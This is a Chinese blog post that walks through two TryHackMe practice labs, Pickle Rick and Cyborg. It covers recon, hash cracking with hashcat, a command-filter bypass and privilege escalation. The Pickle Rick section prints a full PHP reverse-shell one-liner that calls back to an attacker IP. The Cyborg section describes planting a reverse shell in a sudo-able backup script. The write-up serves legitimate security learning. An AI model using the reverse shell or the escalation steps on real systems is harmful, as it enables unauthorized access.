<!doctype html>
<html lang="zh"><head>
<title>THM 两个简单靶场记录 - Pr1nt&#39;s_blog</title>
<meta charset="UTF-8">
<meta name="keywords" content="">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5">

<link rel="shortcut icon" href="/images/head/oni.png" type="image/png" />
<meta name="description" content="记录下try hack me的学习之路">
<meta property="og:type" content="article">
<meta property="og:title" content="THM 两个简单靶场记录">
<meta property="og:url" content="http://w0r1d-pr1nt.github.io/2024/02/19/thm/index.html">
<meta property="og:site_name" content="Pr1nt&#39;s_blog">
<meta property="og:description" content="记录下try hack me的学习之路">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://w0r1d-pr1nt.github.io/images/zhaopian/thm-pickle/pickle1.png">
<meta property="og:image" content="http://w0r1d-pr1nt.github.io/images/zhaopian/thm-pickle/pickle2.png">
<meta property="og:image" content="http://w0r1d-pr1nt.github.io/images/zhaopian/thm-pickle/pickle3.png">
<meta property="og:image" content="http://w0r1d-pr1nt.github.io/images/zhaopian/thm-pickle/pickle4.png">
<meta property="og:image" content="http://w0r1d-pr1nt.github.io/images/zhaopian/thm-pickle/pickle5.png">
<meta property="og:image" content="http://w0r1d-pr1nt.github.io/images/zhaopian/thm-pickle/pickle6.png">
<meta property="og:image" content="http://w0r1d-pr1nt.github.io/images/zhaopian/thm-pickle/pickle7.png">
<meta property="og:image" content="http://w0r1d-pr1nt.github.io/images/zhaopian/thm-pickle/pickle8.png">
<meta property="og:image" content="http://w0r1d-pr1nt.github.io/images/zhaopian/thm-pickle/pickleshell.png">
<meta property="og:image" content="http://w0r1d-pr1nt.github.io/images/zhaopian/thm-pickle/pickleshell2.png">
<meta property="og:image" content="http://w0r1d-pr1nt.github.io/images/zhaopian/thm-pickle/pickleshell3.png">
<meta property="og:image" content="http://w0r1d-pr1nt.github.io/images/zhaopian/thm-cyborg/99409.png">
<meta property="og:image" content="http://w0r1d-pr1nt.github.io/images/zhaopian/thm-cyborg/67673.png">
<meta property="og:image" content="http://w0r1d-pr1nt.github.io/images/zhaopian/thm-cyborg/39391.png">
<meta property="og:image" content="http://w0r1d-pr1nt.github.io/images/zhaopian/thm-cyborg/60558.png">
<meta property="og:image" content="http://w0r1d-pr1nt.github.io/images/zhaopian/thm-cyborg/26075.png">
<meta property="og:image" content="http://w0r1d-pr1nt.github.io/images/zhaopian/thm-cyborg/89430.png">
<meta property="og:image" content="http://w0r1d-pr1nt.github.io/images/zhaopian/thm-cyborg/02891.png">
<meta property="og:image" content="http://w0r1d-pr1nt.github.io/images/zhaopian/thm-cyborg/25450.png">
<meta property="og:image" content="http://w0r1d-pr1nt.github.io/images/zhaopian/thm-cyborg/27379.png">
<meta property="og:image" content="http://w0r1d-pr1nt.github.io/images/zhaopian/thm-cyborg/20937.png">
<meta property="og:image" content="http://w0r1d-pr1nt.github.io/images/zhaopian/thm-cyborg/74815.png">
<meta property="og:image" content="http://w0r1d-pr1nt.github.io/images/zhaopian/thm-cyborg/60113.png">
<meta property="og:image" content="http://w0r1d-pr1nt.github.io/images/zhaopian/thm-cyborg/08924.png">
<meta property="og:image" content="http://w0r1d-pr1nt.github.io/images/zhaopian/thm-cyborg/94613.png">
<meta property="og:image" content="http://w0r1d-pr1nt.github.io/images/zhaopian/thm-cyborg/82615.png">
<meta property="og:image" content="http://w0r1d-pr1nt.github.io/images/zhaopian/thm-cyborg/12345.png">
<meta property="og:image" content="http://w0r1d-pr1nt.github.io/images/zhaopian/thm-cyborg/56804.png">
<meta property="og:image" content="http://w0r1d-pr1nt.github.io/images/zhaopian/thm-cyborg/60495.png">
<meta property="og:image" content="http://w0r1d-pr1nt.github.io/images/zhaopian/thm-cyborg/44276.png">
<meta property="article:published_time" content="2024-02-19T02:46:00.000Z">
<meta property="article:modified_time" content="2024-08-13T07:50:51.493Z">
<meta property="article:author" content="Pr1nt">
<meta property="article:tag" content="THM">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://w0r1d-pr1nt.github.io/images/zhaopian/thm-pickle/pickle1.png">

<link rel="stylesheet" href="/lib/fancybox/fancybox.css">
<link rel="stylesheet" href="/lib/mdui_043tiny/mdui.css">


<link rel="stylesheet" href="/lib/iconfont/iconfont.css?v=1761324935241">

<link rel="stylesheet" href="/css/style.css?v=1761324935241">




    
        <link rel="stylesheet" href="/custom.css?v=1761324935241">
    



<script src="/lib/mdui_043tiny/mdui.js" async></script>
<script src="/lib/fancybox/fancybox.umd.js" async></script>
<script src="/lib/lax.min.js" async></script>


<script async src="/js/app.js?v=1761324935241"></script>

 

<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-4D4ZJ9G024"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag("js", new Date());

  gtag("config", "G-4D4ZJ9G024");
</script>


<link rel="stylesheet"  href="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.8.0/styles/atom-one-dark.min.css">
<meta name="generator" content="Hexo 7.3.0"></head><body class="nexmoe mdui-drawer-body-left"><div id="nexmoe-background"><div class="nexmoe-bg" style="background-image: url(/images/background/background.png)"></div><div class="mdui-appbar mdui-shadow-0"><div class="mdui-toolbar"><a class="mdui-btn mdui-btn-icon mdui-ripple" mdui-drawer="{target: &#039;#drawer&#039;, swipe: true}" title="menu"><i class="mdui-icon nexmoefont icon-menu"></i></a><div class="mdui-toolbar-spacer"></div><a class="mdui-btn mdui-btn-icon" href="/" title="Pr1nt"><img src="/images/head/onimai.png" alt="Pr1nt"></a></div></div></div><div id="nexmoe-header"><div class="nexmoe-drawer mdui-drawer" id="drawer">
    <div class="nexmoe-avatar mdui-ripple">
        <a href="/" title="Pr1nt">
            <img src="/images/head/onimai.png" alt="Pr1nt" alt="Pr1nt">
        </a>
    </div>
    <div class="nexmoe-count">
        <div><span>文章</span>21</div>
        <div><span>标签</span>9</div>
        <div><span>分类</span>5</div>
    </div>
    <div class="nexmoe-list mdui-list" mdui-collapse="{accordion: true}">
        
        <a class="nexmoe-list-item mdui-list-item mdui-ripple false" href="/" title="回到首页">
            <i class="mdui-list-item-icon nexmoefont icon-home"></i>
            <div class="mdui-list-item-content">
                回到首页
            </div>
        </a>
        
        <a class="nexmoe-list-item mdui-list-item mdui-ripple false" href="/archives.html" title="文章归档">
            <i class="mdui-list-item-icon nexmoefont icon-container"></i>
            <div class="mdui-list-item-content">
                文章归档
            </div>
        </a>
        
        <a class="nexmoe-list-item mdui-list-item mdui-ripple false" href="/about.html" title="关于Pr1nt">
            <i class="mdui-list-item-icon nexmoefont icon-info-circle"></i>
            <div class="mdui-list-item-content">
                关于Pr1nt
            </div>
        </a>
        
        <a class="nexmoe-list-item mdui-list-item mdui-ripple false" href="/friend.html" title="友情链接">
            <i class="mdui-list-item-icon nexmoefont icon-unorderedlist"></i>
            <div class="mdui-list-item-content">
                友情链接
            </div>
        </a>
        
    </div>
    
    
        
        <div class="nexmoe-widget-wrap">
    <div class="nexmoe-widget nexmoe-search">
        
            <form id="search_form">
                <label><input class="st-default-search-input" id="search_value" name="q" type="search" placeholder="搜索" style="
                    font-size: 15px !important;
                    height: 56px !important;
                    background-image: none;
                "></label>
            </form>
         
    </div>
</div>


	<script async src="/js/search.js?v=1761324935241"></script>



    
        
        <div class="nexmoe-widget-wrap">
	<div class="nexmoe-widget nexmoe-social">
		<a
			class="mdui-ripple"
			href="https://qm.qq.com/q/8up8m0lXc4"
			target="_blank"
			mdui-tooltip="{content: 'QQ'}"
			style="
				color: rgb(249, 174, 8);
				background-color: rgba(249, 174, 8, .1);
			"
		>
			<i
				class="nexmoefont icon-QQ"
			></i> </a
		><a
			class="mdui-ripple"
			href="https://space.bilibili.com/632631573"
			target="_blank"
			mdui-tooltip="{content: '哔哩哔哩'}"
			style="
				color: rgb(231, 106, 141);
				background-color: rgba(231, 106, 141, .1);
			"
		>
			<i
				class="nexmoefont icon-bilibili"
			></i> </a
		><a
			class="mdui-ripple"
			href="https://github.com/W0r1d-Pr1nt/"
			target="_blank"
			mdui-tooltip="{content: 'GitHub'}"
			style="
				color: rgb(25, 23, 23);
				background-color: rgba(25, 23, 23, .1);
			"
		>
			<i
				class="nexmoefont icon-github"
			></i> </a
		>
	</div>
</div>

    
        
        
  <div class="nexmoe-widget-wrap">
    <h3 class="nexmoe-widget-title">文章分类</h3>
    <div class="nexmoe-widget">

      <ul class="category-list">

        


        

        

        <li class="category-list-item">
          <a class="category-list-link" href="/categories/Life/">Life</a>
          <span class="category-list-count">8</span>
        </li>

        

        <li class="category-list-item">
          <a class="category-list-link" href="/categories/Try-Hack-Me/">Try Hack Me</a>
          <span class="category-list-count">3</span>
        </li>

        

        <li class="category-list-item">
          <a class="category-list-link" href="/categories/WriteUp/">WriteUp</a>
          <span class="category-list-count">2</span>
        </li>

        

        <li class="category-list-item">
          <a class="category-list-link" href="/categories/从0到1/">从0到1</a>
          <span class="category-list-count">5</span>
        </li>

        

        <li class="category-list-item">
          <a class="category-list-link" href="/categories/学习/">学习</a>
          <span class="category-list-count">2</span>
        </li>

        
      </ul>

    </div>
  </div>


    
        
        
  <div class="nexmoe-widget-wrap">
    <div id="randomtagcloud" class="nexmoe-widget tagcloud nexmoe-rainbow">
      <a href="/tags/CTF/" style="font-size: 10px;">CTF</a> <a href="/tags/THM/" style="font-size: 13.33px;">THM</a> <a href="/tags/WP/" style="font-size: 10px;">WP</a> <a href="/tags/rce/" style="font-size: 16.67px;">rce</a> <a href="/tags/web/" style="font-size: 13.33px;">web</a> <a href="/tags/%E5%AD%A6%E4%B9%A0/" style="font-size: 10px;">学习</a> <a href="/tags/%E5%BC%80%E5%8F%91/" style="font-size: 10px;">开发</a> <a href="/tags/%E6%80%BB%E7%BB%93/" style="font-size: 13.33px;">总结</a> <a href="/tags/%E6%9D%82%E8%B0%88/" style="font-size: 20px;">杂谈</a>
    </div>
    
  </div>

    
        
        
  <div class="nexmoe-widget-wrap">
    <h3 class="nexmoe-widget-title">文章归档</h3>
    <div class="nexmoe-widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2025/">2025</a><span class="archive-list-count">9</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2024/">2024</a><span class="archive-list-count">9</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2023/">2023</a><span class="archive-list-count">3</span></li></ul>
    </div>
  </div>



    
        
   
    <div class="nexmoe-copyright">
        &copy; 2025 Pr1nt
        Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
        & <a href="https://github.com/theme-nexmoe/hexo-theme-nexmoe" target="_blank">Nexmoe</a>
        <!--
<theme-button value="dark" id="btn" size="3"></theme-button>
<script>
  document.body.style.backgroundColor = "#424242";
  btn.addEventListener("change", e => {
    if (e.detail === 'dark') {
      document.body.style.backgroundColor = "#424242";
    }
    else {
      document.body.style.backgroundColor = "#000000";
    }
  });
</script>
<script src="js/light.js"></script>
-->
<br>
<br>
<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<span id="busuanzi_container_site_pv">
  本站总访问量<span id="busuanzi_value_site_pv"></span>次
</span>
<br>
<span id="busuanzi_container_site_uv">
  本站访客数<span id="busuanzi_value_site_uv"></span>人次
</span>

    </div>
</div><!-- .nexmoe-drawer --></div><div id="nexmoe-content"><div class="nexmoe-primary"><div class="nexmoe-post">
  <article>
    
        <div class="nexmoe-post-cover absolute" style="padding-top: 33.70253164556962%;"> 
            <img src="/images/post/pickle.png" alt="THM 两个简单靶场记录" loading="lazy">
            <h1>THM 两个简单靶场记录</h1>
        </div>
    
    
    <div class="nexmoe-post-meta">
    <div class="nexmoe-rainbow">
        <a class="nexmoefont icon-calendar-fill">2024年02月19日</a>
        
            <a class="nexmoefont icon-appstore-fill -link" href="/categories/Try-Hack-Me/">Try Hack Me</a>
        
        
    <a><i class="nexmoefont icon-areachart"></i>约856字</a>
    <a><i class="nexmoefont icon-time-circle-fill"></i>预计需要3分钟</a>

    </div>
    
    
    
    
    
</div>

    <blockquote>
<p>记录下try hack me的学习之路</p>
</blockquote>
<span id="more"></span>
<ul>
<li><a href="#pickle-rick">Pickle Rick</a>
<ul>
<li><a href="#flag1">flag1</a></li>
<li><a href="#flag2">flag2</a></li>
<li><a href="#flag3">flag3</a></li>
</ul>
</li>
<li><a href="#cyborg">Cyborg</a>
<ul>
<li><a href="#%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86">信息收集</a></li>
<li><a href="#%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3">暴力破解</a></li>
<li><a href="#flag1-1">flag1</a></li>
<li><a href="#flag2-1">flag2</a></li>
</ul>
</li>
</ul>
<h1>Pickle Rick</h1>
<p><img onerror="imgOnError(this);" data-fancybox="gallery" src="/images/zhaopian/thm-pickle/pickle1.png" alt="题目" data-caption="题目" loading="lazy"></p>
<p>需要寻找三部分flag</p>
<hr>
<h3 id="flag1">flag1</h3>
<p>首先打开题目,什么也没有,按F12看到用户名<br>
<img onerror="imgOnError(this);" data-fancybox="gallery" src="/images/zhaopian/thm-pickle/pickle2.png" alt="1" data-caption="1" loading="lazy"></p>
<p>然后信息收集:</p>
<ol>
<li>nmap扫描发现只开了两个端口:22,80</li>
<li>dirsearch扫描发现可疑文件<br>
<img onerror="imgOnError(this);" data-fancybox="gallery" src="/images/zhaopian/thm-pickle/pickle3.png" alt="2" data-caption="2" loading="lazy"></li>
</ol>
<p>访问robots.txt 看到一串字符串: <strong>Wubbalubbadubdub</strong>，猜测是密码<br>
访问login.php 使用用户名和密码登录<br>
<img onerror="imgOnError(this);" data-fancybox="gallery" src="/images/zhaopian/thm-pickle/pickle4.png" alt="3" data-caption="3" loading="lazy"></p>
<p>是一个命令执行窗口，输入<strong>ls</strong>看看<br>
<img onerror="imgOnError(this);" data-fancybox="gallery" src="/images/zhaopian/thm-pickle/pickle5.png" alt="4" data-caption="4" loading="lazy"></p>
<p><strong>cat</strong>一下第一个txt文件发现被过滤，使用经典的绕过：<strong>tac</strong><br>
<img onerror="imgOnError(this);" data-fancybox="gallery" src="/images/zhaopian/thm-pickle/pickle6.png" alt="5" data-caption="5" loading="lazy"><br>
<img onerror="imgOnError(this);" data-fancybox="gallery" src="/images/zhaopian/thm-pickle/pickle7.png" alt="6" data-caption="6" loading="lazy"><br>
得到第一个flag：<strong>mr. meeseek hair</strong></p>
<h3 id="flag2">flag2</h3>
<p>接着tac其他文件发现并无关键信息<br>
clue.txt 内容：<strong>Look around the file system for the other ingredient.</strong><br>
defined.php为：<img onerror="imgOnError(this);" data-fancybox="gallery" src="/images/zhaopian/thm-pickle/pickle8.png" alt="7" data-caption="7" loading="lazy"><br>
显然，权限不够于是思考反弹shell到攻击机，使用php语言<code>php -r '$sock=fsockopen(&quot;10.8.39.215&quot;,9999);$proc=proc_open(&quot;/bin/sh -i&quot;, array(0=&gt;$sock, 1=&gt;$sock, 2=&gt;$sock),$pipes);'</code><br>
<img onerror="imgOnError(this);" data-fancybox="gallery" src="/images/zhaopian/thm-pickle/pickleshell.png" alt="shell" data-caption="shell" loading="lazy"><br>
反弹成功，并发现可以直接使用sudo su 变成root权限<br>
然后就是随心所欲了，cd /home发现rick，进一步拿到第二个flag: <strong>1 jerry tear</strong><br>
<img onerror="imgOnError(this);" data-fancybox="gallery" src="/images/zhaopian/thm-pickle/pickleshell2.png" alt="shell2" data-caption="shell2" loading="lazy"></p>
<h3 id="flag3">flag3</h3>
<p>根据直接提权到root猜测最后一个flag在root目录下（让我们一开始不是root的时候访问不了）<br>
<img onerror="imgOnError(this);" data-fancybox="gallery" src="/images/zhaopian/thm-pickle/pickleshell3.png" alt="shell3" data-caption="shell3" loading="lazy"><br>
拿到最后一个flag：<strong>fleeb juice</strong></p>
<pre><code>总结：这个还是很好玩的，体会到一步步寻找的乐趣，而且也非常简单，适合初学者熟悉大致流程。
</code></pre>
<hr>
<h1>Cyborg</h1>
<h3 id="信息收集">信息收集</h3>
<p>先用nmap扫描开放端口信息，枚举端口上运行的服务</p>
<p><img onerror="imgOnError(this);" data-fancybox="gallery" src="/images/zhaopian/thm-cyborg/99409.png" alt="" data-caption="" loading="lazy"></p>
<p>访问80端口是个apache默认页面，用dirb扫描一下网站目录</p>
<p>发现两个比较可疑的目录/admin和/etc</p>
<p><img onerror="imgOnError(this);" data-fancybox="gallery" src="/images/zhaopian/thm-cyborg/67673.png" alt="" data-caption="" loading="lazy"></p>
<p>再用dirbuster扫一遍目录，得到一个压缩包archive.tar，我以为是源码之类的，打开发现不是。</p>
<p><img onerror="imgOnError(this);" data-fancybox="gallery" src="/images/zhaopian/thm-cyborg/39391.png" alt="" data-caption="" loading="lazy"></p>
<p>现招其它线索，admin.html里有些聊天记录，这里有几个民资Josh、adam、alex</p>
<p>还有一个被描述的很重要的东西叫music_archive</p>
<p><img onerror="imgOnError(this);" data-fancybox="gallery" src="/images/zhaopian/thm-cyborg/60558.png" alt="" data-caption="" loading="lazy"></p>
<h3 id="暴力破解">暴力破解</h3>
<p>随后在/etc目录下发现了这个东西，看起来像是一串密文，特征还比较明显</p>
<p><img onerror="imgOnError(this);" data-fancybox="gallery" src="/images/zhaopian/thm-cyborg/26075.png" alt="" data-caption="" loading="lazy"></p>
<p>打开hashcat的密文类型进行匹配，匹配到1600 $apr1$</p>
<p><a target="_blank" rel="noopener" href="https://hashcat.net/wiki/doku.php?id=example_hashes">https://hashcat.net/wiki/doku.php?id=example_hashes</a></p>
<p><img onerror="imgOnError(this);" data-fancybox="gallery" src="/images/zhaopian/thm-cyborg/89430.png" alt="" data-caption="" loading="lazy"></p>
<p>用hashcat暴力破解</p>
<p><img onerror="imgOnError(this);" data-fancybox="gallery" src="/images/zhaopian/thm-cyborg/02891.png" alt="" data-caption="" loading="lazy"></p>
<p>暴力匹配rockyou得到明文，用这个密码ssh试了所有得到的类似用户的账号都没有进去。</p>
<p><img onerror="imgOnError(this);" data-fancybox="gallery" src="/images/zhaopian/thm-cyborg/25450.png" alt="" data-caption="" loading="lazy"></p>
<p>再回到之前的tar文件，里面有个README，里面指向一个域名</p>
<p><img onerror="imgOnError(this);" data-fancybox="gallery" src="/images/zhaopian/thm-cyborg/27379.png" alt="" data-caption="" loading="lazy"></p>
<p>访问一下，理解大概是一个文件储存仓库的东西</p>
<p><img onerror="imgOnError(this);" data-fancybox="gallery" src="/images/zhaopian/thm-cyborg/20937.png" alt="" data-caption="" loading="lazy"></p>
<p>再github上也找到了相关的项目，这里有个安装包，我们下载来看看</p>
<p><img onerror="imgOnError(this);" data-fancybox="gallery" src="/images/zhaopian/thm-cyborg/74815.png" alt="" data-caption="" loading="lazy"></p>
<p>运行borg就会出现帮助文档</p>
<p><img onerror="imgOnError(this);" data-fancybox="gallery" src="/images/zhaopian/thm-cyborg/60113.png" alt="" data-caption="" loading="lazy"></p>
<h3 id="flag1-2">flag1</h3>
<p>根据文档用list 查看目录下的文件，密码用刚刚破解得到的hash，有个music_archive</p>
<p>用extract提取出来，密码一样。得到一个alex的文件</p>
<p><img onerror="imgOnError(this);" data-fancybox="gallery" src="/images/zhaopian/thm-cyborg/08924.png" alt="" data-caption="" loading="lazy"></p>
<p>看下alex的目录结构类似于“home”目录</p>
<p><img onerror="imgOnError(this);" data-fancybox="gallery" src="/images/zhaopian/thm-cyborg/94613.png" alt="" data-caption="" loading="lazy"></p>
<p>翻了目录得到alex的账号和密码</p>
<p><img onerror="imgOnError(this);" data-fancybox="gallery" src="/images/zhaopian/thm-cyborg/82615.png" alt="" data-caption="" loading="lazy"></p>
<p>ssh上去直接拿到第一个flag</p>
<p><img onerror="imgOnError(this);" data-fancybox="gallery" src="/images/zhaopian/thm-cyborg/12345.png" alt="flag1" data-caption="flag1" loading="lazy"></p>
<h3 id="flag2-2">flag2</h3>
<p>使用sudo -l查看具有sudo权限的命令，有个/etc/mp3backups/backup.sh</p>
<p>查看文件所有者是alex，加个可写权限</p>
<p><img onerror="imgOnError(this);" data-fancybox="gallery" src="/images/zhaopian/thm-cyborg/56804.png" alt="" data-caption="" loading="lazy"></p>
<p>在文件中加入反弹shell命令</p>
<p><img onerror="imgOnError(this);" data-fancybox="gallery" src="/images/zhaopian/thm-cyborg/60495.png" alt="shell" data-caption="shell" loading="lazy"></p>
<p>攻击机上起监听，没一会shell 就过来了</p>
<p>登录后crontab -l看下定时任务，</p>
<p>发现backup.sh在定时任务中</p>
<p>成功拿到root</p>
<p><img onerror="imgOnError(this);" data-fancybox="gallery" src="/images/zhaopian/thm-cyborg/44276.png" alt="" data-caption="" loading="lazy"></p>
<p>flag{Than5s_f0r_play1ng_H0p£_y0u_enJ053d}</p>

    
  </article>

  
      

  
  
  <div class="nexmoe-post-meta nexmoe-rainbow">
   
    
        <a class="nexmoefont icon-tag-fill -none-link" href="/tags/THM/" rel="tag">THM</a>
    
</div>
  
  
    <script async src="/js/copy-codeblock.js?v=1761324935073"></script>
  

  
      <div class="nexmoe-post-footer">
          <script src="https://giscus.app/client.js"
     data-repo="W0r1d-Pr1nt/W0r1d-Pr1nt.github.io"
     data-repo-id="R_kgDOKUqNjA"
     data-category="Announcements"
     data-category-id="DIC_kwDOKUqNjM4CfSnu"
     data-mapping="pathname"
     data-strict="0"
     data-reactions-enabled="1"
     data-emit-metadata="0"
     data-input-position="bottom"
     data-theme="light_high_contrast"
     data-lang="zh-CN"
     crossorigin="anonymous"
     async>
 </script>

      </div>
  
</div></div><div class="nexmoe-post-right">    <div class="nexmoe-fixed">
        <div class="nexmoe-tool">

            

            
            
            <button class="mdui-fab catalog" style="overflow:unset;">
                <i class="nexmoefont icon-i-catalog"></i>
                <div class="nexmoe-toc">
                    <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">1.</span> <span class="toc-text">Pickle Rick</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#flag1"><span class="toc-number">1.0.1.</span> <span class="toc-text">flag1</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#flag2"><span class="toc-number">1.0.2.</span> <span class="toc-text">flag2</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#flag3"><span class="toc-number">1.0.3.</span> <span class="toc-text">flag3</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">2.</span> <span class="toc-text">Cyborg</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="toc-number">2.0.1.</span> <span class="toc-text">信息收集</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3"><span class="toc-number">2.0.2.</span> <span class="toc-text">暴力破解</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#flag1-2"><span class="toc-number">2.0.3.</span> <span class="toc-text">flag1</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#flag2-2"><span class="toc-number">2.0.4.</span> <span class="toc-text">flag2</span></a></li></ol></li></ol></li></ol>
                </div>
            </button>
            

            

            <a href="#nexmoe-content" class="backtop toc-link" aria-label="Back To Top" title="top"><button class="mdui-fab mdui-ripple"><i class="nexmoefont icon-caret-top"></i></button></a>
        </div>
    </div>
</div></div><div id="nexmoe-footer"><!--!--></div><div id="nexmoe-search-space"><div class="search-container"><div class="search-header"><div class="search-input-container"><input class="search-input" type="text" placeholder="搜索" onInput="sinput();"></div><a class="search-close" onclick="sclose();">×</a></div><div class="search-body"></div></div></div><div><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-2058306854838448" crossorigin="anonymous"></script>
</div></body></html>